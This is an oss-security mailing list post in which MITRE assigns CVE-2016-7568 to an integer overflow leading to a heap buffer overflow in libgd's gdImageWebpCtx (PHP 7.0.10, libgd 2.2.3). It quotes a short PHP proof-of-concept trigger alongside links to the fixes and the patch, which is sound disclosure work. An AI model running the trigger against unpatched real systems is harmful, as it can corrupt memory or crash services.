[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] Re: CVE Request: libgd: Integer overflow in function gdImageWebpCtx of gd_webp.c
From: cve-assign () mitre ! org
Date: 2016-09-28 18:54:09
Message-ID: 20160928185409.5FF6C36E015 () smtpvbsrv1 ! mitre ! org
[Download RAW message or body]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
> An integer overflow vulnerability was found in function gdImageWebpCtx
> of file gd_webp.c in libgd. It could lead to heap buffer overflow
> circumstance. Both PHP 7.0.10 and libgd 2.2.3 were affected
>
> PHP reported via https://bugs.php.net/bug.php?id=73003
> PHP fixed via https://github.com/php/php-src/commit/c18263e0e0769faee96a5d0ee04b750c442783c6
> libgd reported via https://github.com/libgd/libgd/issues/308
> libgd fixed via https://github.com/libgd/libgd/commit/40bec0f38f50e8510f5bb71a82f516d46facde03
>
> argb = (uint8_t *)gdMalloc(gdImageSX(im) * 4 * gdImageSY(im)); /* integer overflow!!! */
>
> There is no overflow check before calling the gdMalloc function.
>
> POC
> ini_set('memory_limit', -1);
> $im = imagecreatetruecolor(0x8000, 0x8001);
> imagewebp($im, 'php.webp');
> imagedestroy($im);
>
> AddressSanitizer: heap-buffer-overflow
> WRITE of size 1
>
> PATCH
> if (overflow2(gdImageSX(im), 4)) {
> return;
> }
>
> if (overflow2(gdImageSX(im) * 4, gdImageSY(im))) {
> return;
> }
Use CVE-2016-7568.
- --
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJX7BFqAAoJEHb/MwWLVhi2kfoP/1owiTLiVQs33ewsVmLqdrmq
L20K6eMWkt15djVUcpGtBvH4ebcbnXZdXUIsqKOuQoiwWMYWpC0FTCD9tOK3SKLI
uKcaIcuPKgXfUM3KDgJww1tBZ8t+AKwjRf18A23KAFmJ63LO+QgrZT5nwmW0lff1
QOZ/7F80hBQJa2rOqOCWRg0BWZvPJ5djKfgQ4+3pwEl++4CRoKP2ABsdqwL6SCNe
kw7OvYITxfx9BGEGPh6/NCZoLvTVXEHZjHQVhWlobpGpO75DPC5eEyxCXEO3KBxK
4mKQADERR1yIafLLtlkWYg2awsHg2JOahcjL2vK2/32OOG2gkXe6ihsgUWKWZp/V
HcFBK6l9xo4R5eVm11sr0t9F0H/IYSfqOd7wijfDZbwNELqLi8gO0vWcvj2HNfLs
KzosUgCtz74JVz3vAXdk5e83EJv/9DTXbC5kyA+yfIXaGjm97jSkrXsfktNsnQ4N
5cSWbuxg9W/I5qGuXmhNhqE1EJVRWBkc/3DaCQoS6/XRV9PiUqg0EhZFAtHCcrOg
xO55mA4m1ZjIHUaox4RBEeLIHpIeSNBywAsfFtOmCMTfupNTM1xWft4Nsg3be/p+
4yKY3wr8YZ70fWopenDixR9OKMcUINTCFNB0HGPAsUhBuu4849yExTanXfAdaTa3
EQl2ePo/sn4HttO+tXO2
=3man
-----END PGP SIGNATURE-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic